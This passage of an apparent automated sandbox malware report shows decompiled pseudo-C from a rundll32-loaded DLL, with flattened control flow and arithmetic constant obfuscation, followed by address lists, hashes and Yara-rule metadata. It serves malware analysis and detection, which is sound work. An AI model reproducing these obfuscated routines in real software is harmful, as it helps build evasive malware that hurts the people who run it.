				_t403 = _v616;
				_v628 = _v628 * 0x73;
				_v628 = _v628 << 0xd;
				_v628 = _v628 ^ 0xf6ca7d12;
				_v680 = 0x3092;
				_v680 = _v680 * 0x68;
				_v680 = _v680 << 1;
				_v680 = _v680 + 0xfffffa86;
				_v680 = _v680 ^ 0x00277106;
				_v676 = 0x2780;
				_v676 = _v676 ^ 0x4b6da339;
				_v676 = _v676 * 0x7a;
				_v676 = _v676 << 0xe;
				_v676 = _v676 ^ 0x500a8000;
				_v688 = 0x8ae7;
				_v688 = _v688 | 0x8dfab5cc;
				_v688 = _v688 * 0x18;
				_v688 = _v688 | 0x52f27c13;
				_v688 = _v688 ^ 0x5ff3fe78;
				do {
					while(_t367 != 0x3ba1fc4) {
						if(_t367 == 0x3f32878) {
							_t367 = 0x26bd27de;
							continue;
						} else {
							if(_t367 == 0x20bf73ca) {
								_push(0x10001000);
								_push(_v684);
								E100163BF(E1001BF25(_v648, _v584, __eflags), __eflags, _v708, _v692,  &_v524,  *0x100221b0, _v632,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v600);
								E1001C5F7(_v580, _v664, _v640, _v592, _t351);
								_t414 =  &(_t414[0xb]);
								_t367 = 0x3ba1fc4;
								continue;
							} else {
								if(_t367 == 0x24e637ac) {
									_t357 = _v568;
									_t375 = _v572;
									_v560 = _t357;
									_v552 = _t357;
									_v544 = _t357;
									_v536 = _t357;
									_v532 = _v676;
									_v564 = _t375;
									_v556 = _t375;
									_v548 = _t375;
									_v540 = _t375;
									_t360 = E1000BFA7(_v624, _t375, _v660, _v700,  &_v564, _t403, _v656);
									_t414 =  &(_t414[6]);
									_t367 = 0x2e72accb;
									__eflags = _t360;
									_t361 = 1;
									_t366 =  !=  ? _t361 : _t366;
									continue;
								} else {
									if(_t367 == 0x26bd27de) {
										E10012092(_v652,  &_v572, _v588, _v612);
										_t367 = 0x2c000c16;
										continue;
									} else {
										if(_t367 == 0x2c000c16) {
											_v572 = _v572 - E100023BC();
											_t367 = 0x20bf73ca;
											asm("sbb [esp+0x9c], edx");
											continue;
										} else {
											if(_t367 != 0x2e72accb) {
												goto L18;
											} else {
												E100078F0(_t403, _v672, _v620, _v628, _v680);
											}
										}
									}
								}
							}
						}
						L9:
						return _t366;
					}
					_t350 = E1000492A(_v688, _v616, _v696, _v704, _v596, _t367, _v636, _v644, _t367,  &_v524, 0, _v604, _v668, _v608);
					_t403 = _t350;
					_t414 =  &(_t414[0xc]);
					__eflags = _t350 - 0xffffffff;
					if(__eflags == 0) {
						_t367 = 0x1fc7849e;
						goto L18;
					} else {
						_t367 = 0x24e637ac;
						continue;
					}
					goto L9;
					L18:
					__eflags = _t367 - 0x1fc7849e;
				} while (__eflags != 0);
				goto L9;
			}

































































                                                                        0x1000a176
                                                                        0x1000a180
                                                                        0x1000a18a
                                                                        0x1000a190
                                                                        0x1000a196
                                                                        0x1000a19e
                                                                        0x1000a1a3
                                                                        0x1000a1a8
                                                                        0x1000a1ac
                                                                        0x1000a1b4
                                                                        0x1000a1bc
                                                                        0x1000a1c4
                                                                        0x1000a1cc
                                                                        0x1000a1d4
                                                                        0x1000a1df
                                                                        0x1000a1e7
                                                                        0x1000a1f2
                                                                        0x1000a1fa
                                                                        0x1000a202
                                                                        0x1000a20a
                                                                        0x1000a212
                                                                        0x1000a21a
                                                                        0x1000a21f
                                                                        0x1000a227
                                                                        0x1000a232
                                                                        0x1000a23a
                                                                        0x1000a245
                                                                        0x1000a24d
                                                                        0x1000a252
                                                                        0x1000a25a
                                                                        0x1000a262
                                                                        0x1000a26a
                                                                        0x1000a27e
                                                                        0x1000a283
                                                                        0x1000a28c
                                                                        0x1000a297
                                                                        0x1000a299
                                                                        0x1000a2a1
                                                                        0x1000a2ab
                                                                        0x1000a2ae
                                                                        0x1000a2b2
                                                                        0x1000a2b7
                                                                        0x1000a2bf
                                                                        0x1000a2c7
                                                                        0x1000a2cf
                                                                        0x1000a2d7
                                                                        0x1000a2df
                                                                        0x1000a2e7
                                                                        0x1000a2ef
                                                                        0x1000a2ff
                                                                        0x1000a303
                                                                        0x1000a30b
                                                                        0x1000a316
                                                                        0x1000a321
                                                                        0x1000a32c
                                                                        0x1000a337
                                                                        0x1000a342
                                                                        0x1000a34d
                                                                        0x1000a359
                                                                        0x1000a35e
                                                                        0x1000a368
                                                                        0x1000a36d
                                                                        0x1000a373
                                                                        0x1000a37b
                                                                        0x1000a383
                                                                        0x1000a38d
                                                                        0x1000a390
                                                                        0x1000a394
                                                                        0x1000a39c
                                                                        0x1000a3a7
                                                                        0x1000a3b2
                                                                        0x1000a3bd
                                                                        0x1000a3c5
                                                                        0x1000a3ca
                                                                        0x1000a3d2
                                                                        0x1000a3da
                                                                        0x1000a3e2
                                                                        0x1000a3ea
                                                                        0x1000a3fa
                                                                        0x1000a3fe
                                                                        0x1000a406
                                                                        0x1000a40e
                                                                        0x1000a419
                                                                        0x1000a424
                                                                        0x1000a42f
                                                                        0x1000a437
                                                                        0x1000a43f
                                                                        0x1000a444
                                                                        0x1000a44c
                                                                        0x1000a454
                                                                        0x1000a459
                                                                        0x1000a461
                                                                        0x1000a469
                                                                        0x1000a471
                                                                        0x1000a476
                                                                        0x1000a47e
                                                                        0x1000a486
                                                                        0x1000a48b
                                                                        0x1000a493
                                                                        0x1000a49f
                                                                        0x1000a4a4
                                                                        0x1000a4aa
                                                                        0x1000a4b2
                                                                        0x1000a4ba
                                                                        0x1000a4c7
                                                                        0x1000a4ca
                                                                        0x1000a4d6
                                                                        0x1000a4da
                                                                        0x1000a4e2
                                                                        0x1000a4ea
                                                                        0x1000a4f2
                                                                        0x1000a4fa
                                                                        0x1000a502
                                                                        0x1000a50a
                                                                        0x1000a512
                                                                        0x1000a51a
                                                                        0x1000a522
                                                                        0x1000a52a
                                                                        0x1000a532
                                                                        0x1000a53e
                                                                        0x1000a541
                                                                        0x1000a54a
                                                                        0x1000a553
                                                                        0x1000a55b
                                                                        0x1000a563
                                                                        0x1000a56b
                                                                        0x1000a573
                                                                        0x1000a57b
                                                                        0x1000a588
                                                                        0x1000a58c
                                                                        0x1000a590
                                                                        0x1000a595
                                                                        0x1000a59d
                                                                        0x1000a5aa
                                                                        0x1000a5ae
                                                                        0x1000a5b2
                                                                        0x1000a5ba
                                                                        0x1000a5c2
                                                                        0x1000a5ca
                                                                        0x1000a5d7
                                                                        0x1000a5db
                                                                        0x1000a5e0
                                                                        0x1000a5e8
                                                                        0x1000a5f0
                                                                        0x1000a5fd
                                                                        0x1000a601
                                                                        0x1000a609
                                                                        0x1000a611
                                                                        0x1000a611
                                                                        0x1000a623
                                                                        0x1000a7c7
                                                                        0x00000000
                                                                        0x1000a629
                                                                        0x1000a62f
                                                                        0x1000a749
                                                                        0x1000a74e
                                                                        0x1000a799
                                                                        0x1000a7b5
                                                                        0x1000a7ba
                                                                        0x1000a7bd
                                                                        0x00000000
                                                                        0x1000a635
                                                                        0x1000a637
                                                                        0x1000a6c4
                                                                        0x1000a6cb
                                                                        0x1000a6d2
                                                                        0x1000a6d9
                                                                        0x1000a6e0
                                                                        0x1000a6e7
                                                                        0x1000a6f6
                                                                        0x1000a70a
                                                                        0x1000a715
                                                                        0x1000a71c
                                                                        0x1000a723
                                                                        0x1000a72f
                                                                        0x1000a734
                                                                        0x1000a737
                                                                        0x1000a73c
                                                                        0x1000a740
                                                                        0x1000a741
                                                                        0x00000000
                                                                        0x1000a63d
                                                                        0x1000a643
                                                                        0x1000a6b3
                                                                        0x1000a6ba
                                                                        0x00000000
                                                                        0x1000a645
                                                                        0x1000a64b
                                                                        0x1000a685
                                                                        0x1000a68c
                                                                        0x1000a691
                                                                        0x00000000
                                                                        0x1000a64d
                                                                        0x1000a653
                                                                        0x00000000
                                                                        0x1000a659
                                                                        0x1000a66b
                                                                        0x1000a670
                                                                        0x1000a653
                                                                        0x1000a64b
                                                                        0x1000a643
                                                                        0x1000a637
                                                                        0x1000a62f
                                                                        0x1000a676
                                                                        0x1000a67f
                                                                        0x1000a67f
                                                                        0x1000a80e
                                                                        0x1000a813
                                                                        0x1000a815
                                                                        0x1000a818
                                                                        0x1000a81b
                                                                        0x1000a824
                                                                        0x00000000
                                                                        0x1000a81d
                                                                        0x1000a81d
                                                                        0x00000000
                                                                        0x1000a81d
                                                                        0x00000000
                                                                        0x1000a829
                                                                        0x1000a829
                                                                        0x1000a829
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: a$&2$*F$4$E$$H$Nn$Zh$o#$|Wl\$~0$U
                                                                        • API String ID: 0-3924455481
                                                                        • Opcode ID: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
                                                                        • Instruction ID: 30a98e3762f80b306428089b8d4b001a67ddc991bb08abca52d42ae898d556aa
                                                                        • Opcode Fuzzy Hash: 87d0bd04f5f1a77db645eaf91b6ba43e9ae2281ffe926097a05e1c334afec65f
                                                                        • Instruction Fuzzy Hash: 61F113715083819FE368CF25C989A4BBBF1FBC5758F108A1DF299862A0D7B58949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100193C9, Relevance: 15.3, Strings: 12, Instructions: 259COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E100193C9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				unsigned int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t291;
				void* _t297;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				void* _t347;
				signed int* _t351;

				_t351 =  &_v1168;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x516598;
				_v1108 = 0x3b16;
				_v1108 = _v1108 * 0x74;
				_t347 = 0x311804be;
				_v1108 = _v1108 ^ 0xd50e416f;
				_v1108 = _v1108 ^ 0xd514c4cb;
				_v1084 = 0x7213;
				_v1084 = _v1084 + 0xffff1ce9;
				_v1084 = _v1084 ^ 0xffffb376;
				_v1076 = 0x942d;
				_v1076 = _v1076 + 0x8243;
				_v1076 = _v1076 ^ 0x00015e40;
				_v1160 = 0xefc2;
				_v1160 = _v1160 + 0xffff37ee;
				_v1160 = _v1160 ^ 0xc712f7cb;
				_t301 = 0x1e;
				_v1160 = _v1160 / _t301;
				_v1160 = _v1160 ^ 0x06a2c559;
				_v1168 = 0x8bc8;
				_v1168 = _v1168 >> 0xd;
				_v1168 = _v1168 << 0xd;
				_t302 = 0xb;
				_v1168 = _v1168 * 0x79;
				_v1168 = _v1168 ^ 0x003cfea4;
				_v1092 = 0xa545;
				_v1092 = _v1092 >> 9;
				_v1092 = _v1092 ^ 0x00005d7c;
				_v1140 = 0xa869;
				_v1140 = _v1140 + 0x7fc8;
				_v1140 = _v1140 / _t302;
				_v1140 = _v1140 ^ 0x00006e61;
				_v1116 = 0x2c70;
				_v1116 = _v1116 << 0xf;
				_v1116 = _v1116 << 6;
				_v1116 = _v1116 ^ 0x8e00790e;
				_v1068 = 0x820b;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00020295;
				_v1052 = 0x1207;
				_t303 = 0x11;
				_v1052 = _v1052 * 0x74;
				_v1052 = _v1052 ^ 0x00087ea5;
				_v1072 = 0x355d;
				_v1072 = _v1072 << 8;
				_v1072 = _v1072 ^ 0x00352c0b;
				_v1080 = 0x10d0;
				_v1080 = _v1080 << 0xd;
				_v1080 = _v1080 ^ 0x021a6542;
				_v1088 = 0x6c30;
				_v1088 = _v1088 >> 8;
				_v1088 = _v1088 ^ 0x00000016;
				_v1152 = 0xa8ea;
				_v1152 = _v1152 >> 0xf;
				_v1152 = _v1152 + 0xb411;
				_v1152 = _v1152 + 0x3cf;
				_v1152 = _v1152 ^ 0x0000e46f;
				_v1096 = 0x75ec;
				_v1096 = _v1096 + 0xffff70cd;
				_v1096 = _v1096 ^ 0xfffffc52;
				_v1104 = 0x93ae;
				_v1104 = _v1104 / _t303;
				_v1104 = _v1104 + 0xffff015e;
				_v1104 = _v1104 ^ 0xffff7730;
				_v1056 = 0xbdf9;
				_v1056 = _v1056 ^ 0xd4f8d9ff;
				_v1056 = _v1056 ^ 0xd4f80819;
				_v1128 = 0xf240;
				_v1128 = _v1128 + 0xffffadf5;
				_t304 = 0x6e;
				_v1128 = _v1128 * 0x47;
				_v1128 = _v1128 ^ 0x002c66a2;
				_v1060 = 0xbfc0;
				_v1060 = _v1060 >> 3;
				_v1060 = _v1060 ^ 0x00003168;
				_v1164 = 0xfebb;
				_v1164 = _v1164 + 0xffff52f0;
				_v1164 = _v1164 / _t304;
				_t305 = 0x5a;
				_v1164 = _v1164 / _t305;
				_v1164 = _v1164 ^ 0x00003ceb;
				_v1136 = 0x6ebb;
				_v1136 = _v1136 >> 0xe;
				_v1136 = _v1136 << 0xe;
				_v1136 = _v1136 ^ 0x00005f7f;
				_v1120 = 0xe73f;
				_v1120 = _v1120 ^ 0x98e7fdaf;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0xc7388f6f;
				_v1112 = 0x84f4;
				_v1112 = _v1112 | 0xf7194f1a;
				_v1112 = _v1112 + 0xffffc2ac;
				_v1112 = _v1112 ^ 0xf719aa5d;
				_v1156 = 0x76fc;
				_v1156 = _v1156 + 0xffff5f4d;
				_v1156 = _v1156 + 0xffffa6b8;
				_v1156 = _v1156 + 0xd873;
				_v1156 = _v1156 ^ 0x000078a0;
				_v1124 = 0x47e1;
				_t306 = 0x21;
				_v1124 = _v1124 / _t306;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x000072fc;
				_v1148 = 0x5566;
				_v1148 = _v1148 + 0xffff28de;
				_t307 = 0x31;
				_v1148 = _v1148 * 0x4f;
				_v1148 = _v1148 << 8;
				_v1148 = _v1148 ^ 0xd7f6da53;
				_v1132 = 0xf4f2;
				_v1132 = _v1132 << 3;
				_v1132 = _v1132 + 0x5d4f;
				_v1132 = _v1132 ^ 0x00082308;
				_v1100 = 0x806a;
				_v1100 = _v1100 >> 9;
				_v1100 = _v1100 / _t307;
				_v1100 = _v1100 ^ 0x00006f90;
				_v1144 = 0x33d6;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 >> 4;
				_v1144 = _v1144 | 0x773178e8;
				_v1144 = _v1144 ^ 0x7731353c;
				_v1064 = 0x1023;
				_v1064 = _v1064 + 0x46cd;
				_v1064 = _v1064 ^ 0x00001a8d;
				_t291 = E10014237();
				do {
					while(_t347 != 0x7d8ec07) {
						if(_t347 == 0x1eca11d1) {
							return E10013D7C( &_v520, __eflags, _v1144, _v1064,  &_v1040);
						}
						if(_t347 == 0x311804be) {
							_t347 = 0x7d8ec07;
							continue;
						}
						_t357 = _t347 - 0x3581d11e;
						if(_t347 != 0x3581d11e) {
							goto L8;
						}
						_push(0x10001050);
						_push(_v1056);
						_t297 = E1001BF25(_v1096, _v1104, _t357);
						E100164EC(E10017B6B(), _t357, _t297, _v1164, 0x104,  *0x100221b0 + 0x10,  *0x100221b0 + 0x234, _v1136, _v1120, _v1112);
						_t291 = E1001C5F7(_v1156, _v1124, _v1148, _v1132, _t297);
						_t351 =  &(_t351[0xd]);
						_t347 = 0x1eca11d1;
					}
					_push(0x10001000);
					_push(_v1168);
					E100163BF(E1001BF25(_v1076, _v1160, __eflags), __eflags, _v1140, _v1116,  &_v1040,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1052);
					_t291 = E1001C5F7(_v1072, _v1080, _v1088, _v1152, _t292);
					_t351 =  &(_t351[0xb]);
					_t347 = 0x3581d11e;
					L8:
					__eflags = _t347 - 0x3fe593;
				} while (__eflags != 0);
				return _t291;
			}
















































                                                                        0x100193c9
                                                                        0x100193cf
                                                                        0x100193d6
                                                                        0x100193de
                                                                        0x100193ef
                                                                        0x100193f3
                                                                        0x100193f8
                                                                        0x10019400
                                                                        0x10019408
                                                                        0x10019410
                                                                        0x10019418
                                                                        0x10019420
                                                                        0x10019428
                                                                        0x10019430
                                                                        0x10019438
                                                                        0x10019440
                                                                        0x10019448
                                                                        0x10019456
                                                                        0x1001945b
                                                                        0x10019461
                                                                        0x10019469
                                                                        0x10019471
                                                                        0x10019476
                                                                        0x10019480
                                                                        0x10019483
                                                                        0x10019487
                                                                        0x1001948f
                                                                        0x10019497
                                                                        0x1001949c
                                                                        0x100194a4
                                                                        0x100194ac
                                                                        0x100194bc
                                                                        0x100194c0
                                                                        0x100194c8
                                                                        0x100194d0
                                                                        0x100194d5
                                                                        0x100194da
                                                                        0x100194e2
                                                                        0x100194ea
                                                                        0x100194ef
                                                                        0x100194f7
                                                                        0x1001950a
                                                                        0x1001950b
                                                                        0x10019512
                                                                        0x1001951d
                                                                        0x10019525
                                                                        0x1001952a
                                                                        0x10019532
                                                                        0x1001953a
                                                                        0x1001953f
                                                                        0x10019547
                                                                        0x1001954f
                                                                        0x10019554
                                                                        0x10019559
                                                                        0x10019561
                                                                        0x10019566
                                                                        0x1001956e
                                                                        0x10019576
                                                                        0x1001957e
                                                                        0x10019586
                                                                        0x1001958e
                                                                        0x10019596
                                                                        0x100195a4
                                                                        0x100195a8
                                                                        0x100195b2
                                                                        0x100195ba
                                                                        0x100195c5
                                                                        0x100195d0
                                                                        0x100195db
                                                                        0x100195e3
                                                                        0x100195f2
                                                                        0x100195f5
                                                                        0x100195f9
                                                                        0x10019601
                                                                        0x1001960c
                                                                        0x10019614
                                                                        0x1001961f
                                                                        0x10019627
                                                                        0x10019637
                                                                        0x1001963f
                                                                        0x10019644
                                                                        0x1001964a
                                                                        0x10019652
                                                                        0x1001965a
                                                                        0x1001965f
                                                                        0x10019664
                                                                        0x1001966c
                                                                        0x10019674
                                                                        0x1001967c
                                                                        0x10019681
                                                                        0x10019689
                                                                        0x10019691
                                                                        0x10019699
                                                                        0x100196a1
                                                                        0x100196a9
                                                                        0x100196b1
                                                                        0x100196b9
                                                                        0x100196c1
                                                                        0x100196c9
                                                                        0x100196d1
                                                                        0x100196dd
                                                                        0x100196e2
                                                                        0x100196e8
                                                                        0x100196ed
                                                                        0x100196f5
                                                                        0x100196fd
                                                                        0x1001970a
                                                                        0x1001970b
                                                                        0x1001970f
                                                                        0x10019714
                                                                        0x1001971c
                                                                        0x10019724
                                                                        0x10019729
                                                                        0x10019731
                                                                        0x10019739
                                                                        0x10019741
                                                                        0x1001974c
                                                                        0x10019750
                                                                        0x10019758
                                                                        0x10019760
                                                                        0x10019765
                                                                        0x1001976a
                                                                        0x10019772
                                                                        0x1001977a
                                                                        0x10019782
                                                                        0x1001978a
                                                                        0x1001979a
                                                                        0x100197ae
                                                                        0x100197ae
                                                                        0x100197b8
                                                                        0x00000000
                                                                        0x10019900
                                                                        0x100197c4
                                                                        0x10019852
                                                                        0x00000000
                                                                        0x10019852
                                                                        0x100197ca
                                                                        0x100197cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100197d2
                                                                        0x100197d7
                                                                        0x100197e6
                                                                        0x1001982d
                                                                        0x10019843
                                                                        0x10019848
                                                                        0x1001984b
                                                                        0x1001984b
                                                                        0x10019859
                                                                        0x1001985e
                                                                        0x100198a9
                                                                        0x100198c8
                                                                        0x100198cd
                                                                        0x100198d0
                                                                        0x100198d2
                                                                        0x100198d2
                                                                        0x100198d2
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0l$<51w$?$O]$]5$an$h1$o$p,$<$G$u
                                                                        • API String ID: 0-3006474019
                                                                        • Opcode ID: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
                                                                        • Instruction ID: ac942b02fd569ebf8a703113eda67409e276ddad1249719e751fe3bc4d0fd9ab
                                                                        • Opcode Fuzzy Hash: 74d76b10b9d4370b64a4bc373e1a6ceffc90527932f21f10725b78de007f7111
                                                                        • Instruction Fuzzy Hash: 71D111715087819FE368CF24C98954BBBE1FBC4748F208A1CF5D59A2A0D7B5D989CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10006BC0, Relevance: 15.3, Strings: 12, Instructions: 252COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 99%
                                                                        			E10006BC0() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _t254;
				intOrPtr _t256;
				intOrPtr _t258;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				void* _t299;
				char _t303;
				signed int* _t304;
				void* _t306;

				_t304 =  &_v116;
				_v56 = 0x84b9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 + 0x5ea0;
				_v56 = _v56 ^ 0x0426650f;
				_v108 = 0x299e;
				_v108 = _v108 >> 8;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 ^ 0x000045b0;
				_v112 = 0xab11;
				_v112 = _v112 << 0x10;
				_v112 = _v112 + 0xffff3408;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xc40d3ae9;
				_v80 = 0xee41;
				_t261 = 0x22;
				_v80 = _v80 / _t261;
				_v80 = _v80 ^ 0x83f67a84;
				_t259 = 0;
				_v80 = _v80 ^ 0x83f65317;
				_t299 = 0x23ec3b81;
				_v116 = 0xfedd;
				_v116 = _v116 + 0xd1e5;
				_t262 = 0x7f;
				_v116 = _v116 / _t262;
				_v116 = _v116 << 0xc;
				_v116 = _v116 ^ 0x003ad050;
				_v44 = 0xeb09;
				_t263 = 0x2e;
				_v44 = _v44 * 0x66;
				_v44 = _v44 ^ 0x005de128;
				_v48 = 0x515a;
				_v48 = _v48 | 0x7fc990a4;
				_v48 = _v48 ^ 0x7fc9cd68;
				_v84 = 0xaabb;
				_v84 = _v84 >> 1;
				_v84 = _v84 * 0x5b;
				_v84 = _v84 ^ 0x001e5e5d;
				_v96 = 0x583;
				_v96 = _v96 + 0xd9a1;
				_v96 = _v96 / _t263;
				_v96 = _v96 + 0x3e5;
				_v96 = _v96 ^ 0x000008a1;
				_v100 = 0x8d71;
				_t264 = 0x53;
				_v100 = _v100 * 0xd;
				_v100 = _v100 >> 4;
				_v100 = _v100 / _t264;
				_v100 = _v100 ^ 0x00004ab6;
				_v76 = 0xeaf8;
				_v76 = _v76 << 0xb;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0xeaf83e17;
				_v104 = 0xfdf7;
				_v104 = _v104 + 0xffff8125;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x00004c62;
				_v40 = 0x8162;
				_v40 = _v40 | 0xc691c83f;
				_v40 = _v40 ^ 0xc691a24d;
				_v72 = 0x9e4d;
				_v72 = _v72 << 0xc;
				_v72 = _v72 + 0xffff6436;
				_v72 = _v72 ^ 0x09e41bc8;
				_v92 = 0x78eb;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 | 0xec9d9334;
				_v92 = _v92 << 0xc;
				_v92 = _v92 ^ 0xd933d049;
				_v36 = 0x856f;
				_t265 = 0x39;
				_v36 = _v36 / _t265;
				_v36 = _v36 ^ 0x00001c57;
				_v60 = 0x6631;
				_v60 = _v60 >> 2;
				_v60 = _v60 + 0xffffdfe4;
				_v60 = _v60 ^ 0xffffcf25;
				_v64 = 0x3444;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00000359;
				_v68 = 0xe444;
				_t266 = 0x50;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x16a0;
				_v68 = _v68 ^ 0x00006446;
				_v32 = 0xb62e;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x00006ec1;
				_v52 = 0x9375;
				_v52 = _v52 >> 8;
				_t267 = 0x71;
				_v52 = _v52 * 0xb;
				_v52 = _v52 ^ 0x00007061;
				_v88 = 0x468b;
				_v88 = _v88 / _t267;
				_v88 = _v88 * 0x47;
				_v88 = _v88 >> 2;
				_v88 = _v88 ^ 0x0000270a;
				_t298 = _v28;
				_t303 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t299 - 0x23ec3b81;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t299 = 0x2b5ba3b6;
							continue;
						}
						if(_t299 == 0x591e35e) {
							E1001B981(_v40, _v8 + 1,  *0x100221b0 + 0x10, _v12, _v72, _v92);
							_t304 =  &(_t304[4]);
							_t259 = 1;
							_t299 = 0x3378ea2d;
							 *((intOrPtr*)( *0x100221b0)) = _v16;
							continue;
						}
						if(_t299 == 0x5f14f0f) {
							_t254 = E1001CAA0( &_v24, _v96,  &_v16, _v100, _v76, _v104);
							_t304 =  &(_t304[4]);
							asm("sbb esi, esi");
							_t299 = ( ~_t254 & 0xd218f931) + 0x3378ea2d;
							continue;
						}
						if(_t299 == 0xba7b4d4) {
							_t256 = E1001B806(_v108, _t303, _v112, _v80,  &_v28);
							_t298 = _t256;
							_t304 =  &(_t304[3]);
							if(_t256 == 0) {
								L23:
								return _t259;
							}
							_t299 = 0x176f3fd8;
							continue;
						}
						if(_t299 != 0x176f3fd8) {
							goto L20;
						} else {
							_t299 = 0x2e66d4aa;
							if(_v28 > 2) {
								_t258 = E10015AB8(_v116, _v44, _v48,  *((intOrPtr*)(_t298 + 8)),  &_v20, _v84);
								_t304 =  &(_t304[4]);
								_v24 = _t258;
								if(_t258 != 0) {
									_t299 = 0x5f14f0f;
								}
							}
							continue;
						}
					}
					if(_t299 == 0x2b5ba3b6) {
						_t303 = E1001B8E7();
						_t299 = 0xba7b4d4;
						goto L20;
					}
					if(_t299 == 0x2e66d4aa) {
						E10007BE0(_v32, _t298, _v52, _v88);
						goto L23;
					}
					if(_t299 != 0x3378ea2d) {
						goto L20;
					}
					E100091CD(_v36, _v60, _v64, _v24, _v68);
					_t304 =  &(_t304[3]);
					_t299 = 0x2e66d4aa;
					goto L1;
					L20:
				} while (_t299 != 0x16656518);
				goto L23;
			}














































                                                                        0x10006bc0
                                                                        0x10006bc3
                                                                        0x10006bcd
                                                                        0x10006bd2
                                                                        0x10006bda
                                                                        0x10006be2
                                                                        0x10006bea
                                                                        0x10006bef
                                                                        0x10006bf4
                                                                        0x10006bf9
                                                                        0x10006c01
                                                                        0x10006c09
                                                                        0x10006c0e
                                                                        0x10006c16
                                                                        0x10006c1b
                                                                        0x10006c23
                                                                        0x10006c35
                                                                        0x10006c3a
                                                                        0x10006c40
                                                                        0x10006c48
                                                                        0x10006c4a
                                                                        0x10006c52
                                                                        0x10006c57
                                                                        0x10006c5f
                                                                        0x10006c6b
                                                                        0x10006c70
                                                                        0x10006c76
                                                                        0x10006c7b
                                                                        0x10006c83
                                                                        0x10006c90
                                                                        0x10006c93
                                                                        0x10006c97
                                                                        0x10006c9f
                                                                        0x10006ca7
                                                                        0x10006caf
                                                                        0x10006cb7
                                                                        0x10006cbf
                                                                        0x10006cc8
                                                                        0x10006ccc
                                                                        0x10006cd4
                                                                        0x10006cdc
                                                                        0x10006cec
                                                                        0x10006cf0
                                                                        0x10006cf8
                                                                        0x10006d00
                                                                        0x10006d0d
                                                                        0x10006d0e
                                                                        0x10006d12
                                                                        0x10006d1d
                                                                        0x10006d21
                                                                        0x10006d29
                                                                        0x10006d31
                                                                        0x10006d36
                                                                        0x10006d3b
                                                                        0x10006d43
                                                                        0x10006d4b
                                                                        0x10006d53
                                                                        0x10006d58
                                                                        0x10006d5d
                                                                        0x10006d65
                                                                        0x10006d6f
                                                                        0x10006d77
                                                                        0x10006d7f
                                                                        0x10006d87
                                                                        0x10006d8c
                                                                        0x10006d94
                                                                        0x10006d9c
                                                                        0x10006da4
                                                                        0x10006da9
